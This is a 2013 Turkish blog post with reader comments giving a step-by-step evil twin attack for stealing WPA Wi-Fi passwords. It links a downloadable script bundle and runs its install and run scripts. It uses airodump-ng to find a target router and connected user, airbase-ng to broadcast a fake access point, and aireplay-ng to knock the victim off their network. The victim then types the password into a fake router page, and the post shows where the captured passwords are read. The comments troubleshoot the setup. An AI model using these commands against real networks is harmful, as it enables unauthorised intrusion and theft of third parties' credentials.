21 Mayıs 2013 Salı

2013 Evil Twin Wpa Hackleme - Tek Seferde Script li kurulum

İlgili scrip bana ait değildir. Sadece uygulamalı olarak göstermeye gayret ettim. Resimler ve yazılar benim birebir uygulamamdır.

Orjinal konu için : http://1001sifrekirma.blogspot.com/2013/05/2013-evil-twin-wpa-hackleme-tek-seferde.html

DOSYA İNDİRME ADRESİ

http://www.mediafire.com/download/udqfq2ie74z6v73/Dosyalar_v2.zip



* cd Desktop
* unzip Dosyalar_v2.zip
* cd Dosyalar
* sh kur.sh

 bu komutları veriyoruz.2 tane pencere açılıyor
her ikisinede evet deyin.
bu esnada kablodan internetimiz olmalı
kablosuz şuan beklemede.
WMware 9 - BackTrack 5 R3 Ralink 3070 kullnıyorum
Realteklede sorun yaşamadım.


seçenekleri gelecek siz modemi numarasını seçip enterlayın

şimdi... saldırı yapacağımız modem ve ona bağlı ağ kartının
mac adresini ve modem adını bir yere not edin .
eğer bunlara erişemediyseniz

airmon-ng
airmon-ng start wlan0
airodump-ng mon0     

ile ağları dinleyin.
 mon0 ve wlan0 değerleri sizde değişik olabilir.
örneğin bende mon2 wlan1 ..

 normal tarama yapıp ağları buluyorsa sorun yok demektir.

atak yapacağınız modeme bağlı kullanıcı olmasına dikkat edin.
böylece onu düşürüp feyk ağına çekebiliriz onu.
bu sebeble alttaki resimdeki değerlere dikkat edin.

ağımız ve bilgilerimiz tespit edildi üstteki resimde oldugu gibi

bunları bir yere not alın


modem mac        :50:67:xx:xx:xx:xx
bağlı kullanıcı : 18:F4:xx:xx:xx:xx
modem adı :       xxxxx
modem markası : tp-link

bu ayarıda yapmayı ihmal etmeyin



 
Şimdi Fake Ağ yayınımızı oluşturmak için aşağıdaki kodu kullanacağız...

yeni consol açın

airbase-ng -e seqer -c 6 mon0

sonra

sh run.sh   komutunu ilk açtığınız konsola yazın

1 =>> Airties
2 =>> Huawei
3 =>> TP-link
4 =>> ZyXEL
TP-link kuruldu
Modem Kurulumu Tamamlandı!
WwW.1001sifrekirma.blogspot.com tarafından hazırlanmıştır...
root@bt:~/Desktop/Dosyalar# sh run.sh

 alttaki gibi bir ekran çıkacak (modemden düşen olup bağlanmaya çalılştığında bu pencereden gözüküyor)


geriye modeme bağlı bir kullanıcı bulup onu düşürmek ve kendi ağımıza çekmek.
bence en zoruda bu.
yeni pencere açalım

aireplay-ng -0 0 -a 50:67:xx:xx:xx:xx -c xx:F4:xx:B7:xx:xx mon0
böyle bir ekran çıkacak

geriye kalan kısım kullanıcının şifresini girmesi.
bu yapılanlar ile adam feyk modeme bağlanırsa
ilk pencerede şifre arayüzü geliyor.

bunu hiçbir ayarı ellemeden başka bir pc den
yada windows üzerinden dahili kablosuz ağ kartından ağa bağlanıp
deneyin. göreceksiniz çalıyor.

http://127.0.0.1/db.php kontrol edersiniz.

16 yorum:

  1. diğer bilgisayarda deneme için yaptım kendim bağlanıyorum fakat internet erişimi yok modem sayfası açılmıyor. Backtrack kurulu bilgisayarda kabololu bağlantı yok wireless ile işlem yapıyorum ondan olabilir mi

    YanıtlaSil
  2. BACKTRACTA KABLOLU BAĞLANTIN OLMALI

    YanıtlaSil
    Yanıtlar
    1. malesef öyle bir imkanım yok kablosuz için bir çözüm yok mu.

      Sil
    2. paketler için net lazım. ama sonrasında sunucu olarak ath kulannmakta sanırım

      Sil
  3. Ben birkeresinde aynı antenle hem interneti almıştım hemde airbase üzerinden yayın yapmıştım.

    YanıtlaSil
  4. Bir de internete niçin bağlı olmamız gerekiyor ? paketler kurulduktan sonra interneti ayırsak olur mu ?

    YanıtlaSil
  5. internet il başta paketler için lazım. sonrasında sanırım eth sunucu olarak kullanıyor sistem. interneti kesiyoruz zaten ama at0 konumuna alıyoruz. buda ağa bağlanıldığı zaman modem arayüzüne ulaşmayı sağlıyor. ben buna dikkat ettim yaparken. sizde mevcut ayarları ellemeden deneyin. son yzdığım şekli ile her denemem de sorunsuz olarak başka pc lerde bağlandım , modem arayüzüne girdim şifreyi yazıdm. kpnrol ettiğmde bactrac saysasına geldi şifreler

    YanıtlaSil
  6. live cd den yapma bakalım. çünkü ben hdd ye kuruyorum . sende oyle dene ne olur.

    YanıtlaSil
  7. aynen bende hdd ye kurucam zaten kullanmadığım 4 kasa var :Dbirini artık bu iş için kullanıcaz . Siz hiç denedinizmi live cd den ? birde 2 sayfa acılıcak demişsiniz onlar ne sayfası ? hocam çok sağolun valla en azından konuya bir açıklık getirdiniz hepter hocam ın sanırsam işi var müsait değil.

    YanıtlaSil
    Yanıtlar
    1. live cd den hiç çalışmadım. aynen windows gibi kullandığım için eklenti vs lazım oluyor. cd çıkarınca herşey sıfırlanıyor..

      Sil
  8. Ozm biz yapamayan arkadaşların sorunu live cd den kaynaklı .Sizden ricam müsaitseniz imkanınız varsa live cd den de bir denermisiniz ? Böylece kesin bir sonuca varıp arkadaşları ya wm ware üzerinden kurmaya yada ayrı bir partision acarak oraya kurma konusunda yönlendiririz . Çünkü yapabilen arkadaş sayısı belli onlarda ya kurulum yapmış yada vmware üzerinden çalışmış . TEşkkürler. Hayırlı akşamlar.

    YanıtlaSil
  9. sen müsaitsen kurup denesen olmaz mı ? .. bence backtrack wmare üzerinden hdd ye kurun. ondan sonra yapın bunları. bendeki sistem bu ve çalışıyor

    YanıtlaSil
  10. Finallerim bitsin ilk işim kurup denemek olacak hocam :)

    YanıtlaSil
  11. internet dns sorgulaması için gerekli ama bu arkdas dns serverda kurmuş dns otomatik al yaparsa internet gerekmez ama ell ile verdiyse ip sorgulama yapabilmesi için internet olması gerek

    YanıtlaSil
  12. Bu yorum yazar tarafından silindi.

    YanıtlaSil
  13. Bu yorum yazar tarafından silindi.

    YanıtlaSil